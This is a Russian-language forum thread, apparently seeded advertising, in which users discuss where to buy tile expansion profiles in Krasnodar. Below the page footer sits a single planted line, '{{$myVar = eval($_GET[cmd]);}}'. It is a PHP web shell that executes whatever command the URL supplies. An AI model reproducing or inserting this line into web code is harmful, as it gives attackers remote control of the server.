+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Плиточные профили


  1. #1
    Мимо проходил martin is on a distinguished road Аватар для martin
    Регистрация
    22.12.2018
    Откуда
    World
    Машина
    Golf Alltrack
    Сообщений
    11

    Плиточные профили

    Вышло так, что я организовал бригаду мастеров отделочных работ, которые сейчас в основном специализируются на укладке плитки. И вот у меня возникла острая необходимость в плиточных компенсационных профилях, которые хотелось бы купить мелким оптом в Краснодаре по честным, демократическим ценам. Как вариант, нашел сайт, где предоставлен каталог самых различных деформационных профилей для плитки https://krasnodar.arfen.ru/catalog/p...macionnye-shvy . Но я человек переборчивый по своей натуре и поэтому с окончательным выбором не спешу. Да и хочу узнать и ваше мнение, как считаете, где можно купить данную продукцию по наиболее приемлемым ценам?

  2. #2
    Мимо проходил genka is on a distinguished road Аватар для genka
    Регистрация
    21.12.2018
    Откуда
    Россия
    Машина
    Golf
    Сообщений
    11
    Обычно такой специфический товар покупаю в строительных магазинах города, где часто можно попасть на выгодные скидки, акции. Так что советую вам пройтись по таким магазинам и прицениться к профилям.

  3. #3
    Мимо проходил iljas is on a distinguished road Аватар для iljas
    Регистрация
    23.12.2018
    Откуда
    .
    Машина
    Volkswagen
    Сообщений
    12
    Слушайте, не так давно был на местном рынке, так там таких деформационных плиточных профилей продают навалом. Думаю если хорошенько пройтись по базару, то можно найти такие профили по приемлемым низким ценам.

  4. #4
    Мимо проходил masik is on a distinguished road Аватар для masik
    Регистрация
    28.12.2018
    Откуда
    .
    Машина
    Golf 1
    Сообщений
    11
    Ну не знаю, когда мне нужно приобрести строительные материалы, это касается и плиточных профилей, то стараюсь покупать такой товар на сайтах, где по моему мнению сейчас цены ниже, чем в других местах.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}